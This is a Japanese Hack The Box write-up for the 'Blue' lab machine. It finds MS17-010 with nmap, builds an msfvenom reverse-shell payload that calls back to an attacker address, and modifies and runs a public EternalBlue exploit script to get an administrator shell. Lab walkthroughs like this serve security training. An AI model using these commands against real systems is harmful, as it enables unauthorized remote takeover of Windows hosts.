Hack The Box Writeup | Blue

BlueはWindowsのマシンで、難易度はeasyです。

・使用ツール
nmap
msfvenom

流れとしては、以下のようになっています。
1.nmapのスクリプエンジンで「MS17-010」を特定
2.「MS17-010」のexploitをダウンロードして修正し実行

1.Enumeration

nmpaでオープンポートを確認

脆弱性確認のスクリプトエンジンを実行(–script vuln)

「MS17-010」の脆弱性があることを確認できます。

2.Exploitation

exploitをダウンロードします。

git clone https://github.com/helviojunior/MS17-010.git

リバースシェルのペイロードを作成します。

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.14 LPORT=1234 -f exe > reverseShell.exe

ncコマンドでリバースシェルを待ち受けます。

exploitコードをコピーします。

smbclientでパスワードなしで/Usersに接続できることを確認できました。

zzz_exploit.pyを修正します。
■修正前

■修正後
smbでパスワードなしで接続できたので、「USERNAME」は「\\」にします。

USERNAME = '\\'
smb_send_file(smbConn, '/home/kali/hackTheBox/Blue/reverseShell.exe', 'C', '/reverseShell.exe')
service_exec(conn, r'cmd /c c:\\reverseShell.exe')

exploitを実行しますが、「ImportError: No module named mysmb」のエラーが発生します。同じディレクトリに「mysmb.py」が必要みたいなので、コピーします。

再度exploitを実行すると、リバースシェルが成功します。管理者権限になっているので、特権エスカレーションは不要です。

python zzz_exploit.py 10.10.10.40 ntsvcs